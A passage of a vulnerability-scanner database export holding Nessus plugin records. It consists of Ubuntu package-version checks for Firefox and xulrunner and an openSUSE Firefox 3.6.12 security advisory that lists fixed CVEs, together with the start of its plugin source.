(ubuntu_check(osver:\"9.04\", pkgname:\"firefox-3.0-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-3.0-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-3.0-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-gnome-support-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-granparadiso\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-granparadiso-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-granparadiso-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-libthai\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-trunk\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-trunk-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-trunk-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2-dbg\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2-gnome-support\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2-testsuite\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2-testsuite-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.0\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.0-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.1\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.1-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.5\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.5-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2-dom-inspector\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2-libthai\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0-dom-inspector\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0-venkman\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.1\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.1-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.1-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.1-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.1-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.5\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.5-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.5-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.5-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.5-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-dom-inspector\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-gnome-support-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1-dbg\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1-dev\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1-gnome-support\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1-testsuite\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.1-testsuite-dev\", pkgver:\"1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2-dbg\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2-gnome-support\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2-testsuite\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-1.9.2-testsuite-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"xulrunner-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"abrowser\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"abrowser-3.5\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"abrowser-3.5-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"abrowser-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2-dom-inspector\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-2-libthai\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.0\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.0-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.0-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.5\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.5-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.5-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.5-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-3.5-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-gnome-support-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"firefox-mozsymbols\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2-dbg\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2-gnome-support\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2-testsuite\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-1.9.2-testsuite-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"xulrunner-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"abrowser\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"abrowser-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox-gnome-support-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"firefox-mozsymbols\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2-dbg\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2-gnome-support\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2-testsuite\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-1.9.2-testsuite-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"xulrunner-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"abrowser / abrowser-3.0 / abrowser-3.0-branding / abrowser-3.1 / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:03:49", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=645315", "https://bugzilla.novell.com/show_bug.cgi?id=649492"], "pluginID": "75648", "description": "This update brings Mozilla Firefox to version 3.6.12, fixing various bugs and security issues.\n\nThe following security issues were fixed: MFSA 2010-64: Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code. References\n\nPaul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - CVE-2010-3176\n\nGary Kwong, Martijn Wargers and Siddharth Agarwal reported memory safety problems that affected Firefox 3.6 only.\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\nMFSA 2010-65 / CVE-2010-3179: Security researcher Alexander Miller reported that passing an excessively long string to document.write could cause text rendering routines to end up in an inconsistent state with sections of stack memory being overwritten with the string data.\nAn attacker could use this flaw to crash a victim's browser and potentially run arbitrary code on their computer.\n\nMFSA 2010-66 / CVE-2010-3180: Security researcher Sergey Glazunov reported that it was possible to access the locationbar property of a window object after it had been closed. Since the closed window's memory could have been subsequently reused by the system it was possible that an attempt to access the locationbar property could result in the execution of attacker-controlled memory.\n\nMFSA 2010-67 / CVE-2010-3183: Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that when window.__lookupGetter__ is called with no arguments the code assumes the top JavaScript stack value is a property name. Since there were no arguments passed into the function, the top value could represent uninitialized memory or a pointer to a previously freed JavaScript object. Under such circumstances the value is passed to another subroutine which calls through the dangling pointer, potentially executing attacker-controlled memory.\n\nMFSA 2010-68 / CVE-2010-3177: Google security researcher Robert Swiecki reported that functions used by the Gopher parser to convert text to HTML tags could be exploited to turn text into executable JavaScript. If an attacker could create a file or directory on a Gopher server with the encoded script as part of its name the script would then run in a victim's browser within the context of the site.\n\nMFSA 2010-69 / CVE-2010-3178: Security researcher Eduardo Vela Nava reported that if a web page opened a new window and used a javascript:\nURL to make a modal call, such as alert(), then subsequently navigated the page to a different domain, once the modal call returned the opener of the window could get access to objects in the navigated window. This is a violation of the same-origin policy and could be used by an attacker to steal information from another website.\n\nMFSA 2010-70 / CVE-2010-3170: Security researcher Richard Moore reported that when an SSL certificate was created with a common name containing a wildcard followed by a partial IP address a valid SSL connection could be established with a server whose IP address matched the wildcard range by browsing directly to the IP address. It is extremely unlikely that such a certificate would be issued by a Certificate Authority.\n\nMFSA 2010-71 / CVE-2010-3182: Dmitri Gribenko reported that the script used to launch Mozilla applications on Linux was effectively including the current working directory in the LD_LIBRARY_PATH environment variable. If an attacker was able to place into the current working directory a malicious shared library with the same name as a library that the bootstrapping script depends on the attacker could have their library loaded instead of the legitimate library.\n\nMFSA 2010-73 / CVE-2010-3765: Morten Kråkvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms.", "edition": 4, "reporter": "Tenable", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : MozillaFirefox (MozillaFirefox-3422)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mozilla-xulrunner192-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-other-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-devel", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-buildsymbols", "p-cpe:/a:novell:opensuse:mozilla-js192", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-translations-common-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner192-gnome-32bit", "cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other", "p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:mozilla-js192-32bit"], "id": "SUSE_11_3_MOZILLAFIREFOX-101029.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75648", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update MozillaFirefox-3422.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75648);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2014/06/13 21:55:23 $\");\n\n script_cve_id(\"CVE-2010-3170\", \"CVE-2010-3174\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox (MozillaFirefox-3422)\");\n script_summary(english:\"Check for the MozillaFirefox-3422 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings Mozilla Firefox to version 3.6.12, fixing various\nbugs and security issues.\n\nThe following security issues were fixed: MFSA 2010-64: Mozilla\ndevelopers identified and fixed several memory safety bugs in the\nbrowser engine used in Firefox and other Mozilla-based products. Some\nof these bugs showed evidence of memory corruption under certain\ncircumstances, and we presume that with enough effort at least some of\nthese could be exploited to run arbitrary code. References\n\nPaul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh\nSoref reported memory safety problems that affected Firefox 3.6 and\nFirefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - CVE-2010-3176\n\nGary Kwong, Martijn Wargers and Siddharth Agarwal reported memory\nsafety problems that affected Firefox 3.6 only.\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\nMFSA 2010-65 / CVE-2010-3179: Security researcher Alexander Miller\nreported that passing an excessively long string to document.write\ncould cause text rendering routines to end up in an inconsistent state\nwith sections of stack memory being overwritten with the string data.\nAn attacker could use this flaw to crash a victim's browser and\npotentially run arbitrary code on their computer.\n\nMFSA 2010-66 / CVE-2010-3180: Security researcher Sergey Glazunov\nreported that it was possible to access the locationbar property of a\nwindow object after it had been closed. Since the closed window's\nmemory could have been subsequently reused by the system it was\npossible that an attempt to access the locationbar property could\nresult in the execution of attacker-controlled memory.\n\nMFSA 2010-67 / CVE-2010-3183: Security researcher regenrecht reported\nvia TippingPoint's Zero Day Initiative that when\nwindow.__lookupGetter__ is called with no arguments the code assumes\nthe top JavaScript stack value is a property name. Since there were no\narguments passed into the function, the top value could represent\nuninitialized memory or a pointer to a previously freed JavaScript\nobject. Under such circumstances the value is passed to another\nsubroutine which calls through the dangling pointer, potentially\nexecuting attacker-controlled memory.\n\nMFSA 2010-68 / CVE-2010-3177: Google security researcher Robert\nSwiecki reported that functions used by the Gopher parser to convert\ntext to HTML tags could be exploited to turn text into executable\nJavaScript. If an attacker could create a file or directory on a\nGopher server with the encoded script as part of its name the script\nwould then run in a victim's browser within the context of the site.\n\nMFSA 2010-69 / CVE-2010-3178: Security researcher Eduardo Vela Nava\nreported that if a web page opened a new window and used a javascript:\nURL to make a modal call, such as alert(), then subsequently navigated\nthe page to a different domain, once the modal call returned the\nopener of the window could get access to objects in the navigated\nwindow. This is a violation of the same-origin policy and could be\nused by an attacker to steal information from another website.\n\nMFSA 2010-70 / CVE-2010-3170: Security researcher Richard Moore\nreported that when an SSL certificate was created with a common name\ncontaining a wildcard followed by a partial IP address a valid SSL\nconnection could be established with a server whose IP address matched\nthe wildcard range by browsing directly to the IP address. It is\nextremely unlikely that such a certificate would be issued by a\nCertificate Authority.\n\nMFSA 2010-71 / CVE-2010-3182: Dmitri Gribenko reported that the script\nused to launch Mozilla applications on Linux was effectively including\nthe current working directory in the LD_LIBRARY_PATH environment\nvariable. If an attacker was able to place into the current working\ndirectory a malicious shared library with the same name as a library\nthat the bootstrapping script depends on the attacker could have their\nlibrary loaded instead of the legitimate 